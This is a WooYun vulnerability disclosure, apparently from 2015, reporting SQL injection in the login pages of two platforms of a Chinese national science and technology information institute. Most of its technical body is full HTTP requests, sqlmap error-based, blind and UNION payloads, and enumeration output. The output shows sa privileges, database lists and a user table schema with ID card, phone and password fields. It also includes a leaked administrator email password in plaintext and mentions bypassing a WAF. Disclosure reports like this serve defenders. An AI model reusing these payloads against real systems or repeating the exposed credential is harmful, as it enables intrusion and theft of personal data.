当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164980

漏洞标题:某国家级科技信息研究机构网站若干平台存在SQL注入(sa权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-29 02:06

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-29: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

rt.

详细说明:

中国科学技术信息研究所(简称中信所)是在周恩来总理、聂荣臻元帅等党和国家领导人的指示和关怀下,于1956年10月成立的,是科技部直属的国家级公益类科技信息研究机构。定位于“为科技部等政府部门提供决策支持,为科技创新主体(企业、高等院校、科研院所和科研人员)提供全方位的信息服务;成为全国科技信息领域的共享管理与服务中心、学术中心、人才培养中心和网络技术研究推广中心,成为国家科技创新体系的重要支撑,并在全国科技信息系统中发挥指导和示范作用”。
中信所首页:http://**.**.**.**
0x01.先从中信所首页进入该机构下属的科技情报与服务研究平台—中国科技情报网
http://**.**.**.**/
根目录下有个login.aspx:

1.png


此处的认证存在SQL注入:

POST /Login.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/login.html
Cookie: .ANONYMOUS=KkfYz0Ot00w-AjSvU11mEOfrTsCS_G8ybQe8kR_o2k-QZ5NBA9rV7zUNxs3nbQMeq76bm74XOV4xku2vryzb9XYrOg2P_Yp6VZYawOjLDOGZ0CL-00xg0etPlDkMjBY_FAa0Qhny8nmRhFcG_jPhsX4TvMo1; ASP.NET_SessionId=m5ky3abvp5hdlsiikq1zst45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
__VIEWSTATE=%2FwEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba%2B2mQPJcmVPUk%2F9oqjU%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60%3D&name=admin&btnUpdate=+&password=123456


注入类型和服务器配置:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba 2mQPJcmVPUk/9oqjU=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60=&name=admin' AND 8179=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(107) CHAR(98) CHAR(113) (SELECT (CASE WHEN (8179=8179) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(113) CHAR(106) CHAR(113))) AND 'alrR'='alrR&btnUpdate= &password=123456
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba 2mQPJcmVPUk/9oqjU=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60=&name=admin' AND 7689=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'RJLx'='RJLx&btnUpdate= &password=123456
---
[14:50:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:50:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库共16个,且权限为sa:

available databases [16]:
[*] InfoSoft(QBJC)
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Wanfang(ChinaInfo)
[*] Wanfang(ChinaInfo)2
[*] Wanfang(ChinaInfo)3
[*] Wanfang(Climate)
[*] Wanfang(hu)
[*] Wanfang(region)
[*] WFMS
[*] WFMS_Huijiao
[*] WFMSH
current database:    'Wanfang(ChinaInfo)'
current user:    'sa'
current user is DBA:    True


在当前库共有216张表,可看到六千多用户资料:

Database: Wanfang(ChinaInfo)
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.WF_User | 6530    |
+-------------+---------+
Database: Wanfang(ChinaInfo)
Table: WF_User
[20 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| Address       | varchar          |
| Answer        | varchar          |
| Create_Time   | char             |
| Email         | nvarchar         |
| Email_Visible | char             |
| Gender        | char             |
| ID_Card       | varchar          |
| Mobile_phone  | varchar          |
| MSN           | varchar          |
| Name_Visible  | char             |
| Phone         | varchar          |
| Postcode      | nvarchar         |
| QQ            | varchar          |
| Question      | varchar          |
| User_ID       | int              |
| User_Name     | varchar          |
| User_Pwd      | varchar          |
| User_Realname | varchar          |
| User_Type_ID  | int              |
| UserId        | uniqueidentifier |
+---------------+------------------+


管理员邮箱:

Database: Wanfang(ChinaInfo)
Table: WF_ManagerEmail
[1 entry]
+----+-----------------------+--------------+------------------+
| ID | EmailUid              | EmailPwd     | EmailSMTP        |
+----+-----------------------+--------------+------------------+
| 3  | chinainfo@**.**.**.** | infochina123 | mail.**.**.**.** |
+----+-----------------------+--------------+------------------+


2.png


其他库没去看。
0x02.从中信所首页进入全国科技查新网
http://chaxin.**.**.**.**/
根目录下也有个login.aspx:

3.png


依然是POST类型的SQL注入:

POST /login.aspx HTTP/1.1
Host: chaxin.**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://chaxin.**.**.**.**/login.aspx
Cookie: .ANONYMOUS=BVFc3gIqgHc8tCVQveXuWAnomCMG3pA5SmqKdb8iT7fVVA5tt5pIDBGsVpbujB4hSITYAQ1VKJDLqYxx6JROhe_-2J1nR0Qq_YTZ9943wUE9eqdSUJWGUb8KWmVb1sveuCls6PdT3ILF9isAUmE01wEHmvg1; ASP.NET_SessionId=qh3ar545j2h5jh55hlcrp132
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
__VIEWSTATE=%2FwEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba%2B2mQPJcmVPUk%2F9oqjU%3D&__EVENTVALIDATION=%2FwEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60%3D&name=admin&btnUpdate=&password=12345


其中的name参数和password参数均可注入,拿name参数来说:

sqlmap identified the following injection point(s) with a total of 257 HTTP(s) requests:
---
Parameter: name (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba+2mQPJcmVPUk/9oqjU=&__EVENTVALIDATION=/wEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60=&name=admin' AND 2694=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2694=2694) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(98)+CHAR(113))) AND 'owwx'='owwx&btnUpdate=&password=12345
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)
    Payload: __VIEWSTATE=/wEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba+2mQPJcmVPUk/9oqjU=&__EVENTVALIDATION=/wEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60=&name=admin' OR 2662=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--&btnUpdate=&password=12345
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: __VIEWSTATE=/wEPDwUKMTc3NDYwMTE3M2RkV6GL5c9ba+2mQPJcmVPUk/9oqjU=&__EVENTVALIDATION=/wEWBALMuZaEDwL7uPQdAvKdqKUMAvK94JEP0Nr9IEk3TPOk4ggM6l3Ew3Biz60=&name=admin' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(99)+CHAR(102)+CHAR(112)+CHAR(89)+CHAR(78)+CHAR(116)+CHAR(88)+CHAR(121)+CHAR(80)+CHAR(114)+CHAR(121)+CHAR(106)+CHAR(83)+CHAR(97)+CHAR(109)+CHAR(122)+CHAR(119)+CHAR(114)+CHAR(106)+CHAR(106)+CHAR(79)+CHAR(79)+CHAR(90)+CHAR(86)+CHAR(80)+CHAR(65)+CHAR(98)+CHAR(102)+CHAR(72)+CHAR(122)+CHAR(72)+CHAR(81)+CHAR(109)+CHAR(110)+CHAR(68)+CHAR(104)+CHAR(71)+CHAR(81)+CHAR(76)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&btnUpdate=&password=12345
---
[16:55:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:55:14] [INFO] testing Microsoft SQL Server
[16:55:36] [INFO] confirming Microsoft SQL Server
[16:55:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


使用union共跑出36个库,并且也是sa权限:

available databases [36]:
[*] ArticleApplyDB
[*] chaxincenter
[*] citation
[*] Conference
[*] InfoSoft(chaxin)
[*] InfoSoft(KJGX)
[*] insoft(chaxin)_test0830
[*] Magazine
[*] master
[*] MeetingForecast
[*] model
[*] MonitorDB
[*] msdb
[*] nstlnetversionQK
[*] nstlperiodical09
[*] OECD
[*] Project
[*] qkmx
[*] ReportServerTempDB
[*] SCI_LXL
[*] ScientificReport
[*] SharePoint_AdminContent_29fe884f-056d-405f-97d9-5692ee129eda
[*] SharePoint_Config
[*] sss
[*] temp_fxj_20141121
[*] temp_fxj_20150416
[*] temp_ww
[*] tempdb
[*] test1
[*] testDb
[*] Tfs_Configuration
[*] Tfs_DefaultCollection
[*] Tfs_Warehouse
[*] WaterKS
[*] WebsiteDB
[*] WSS_Content
current database:    'InfoSoft(chaxin)'
current user:    'sa'
current user is DBA:    True


数据太多,就再不往下进行了,两个平台愣是没找着后台账号密码在哪。
可能作为研究机构的话,这里面包含有很多项目之类的敏感信息,请贵所给予重视。
存在漏洞的地方可能不止这两处,看情况应该用的是同样的查询方式,虽然有waf,我用了tamper绕过了。

漏洞证明:

已证。

修复方案:

加强过滤,仔细排查。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-05 16:07

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价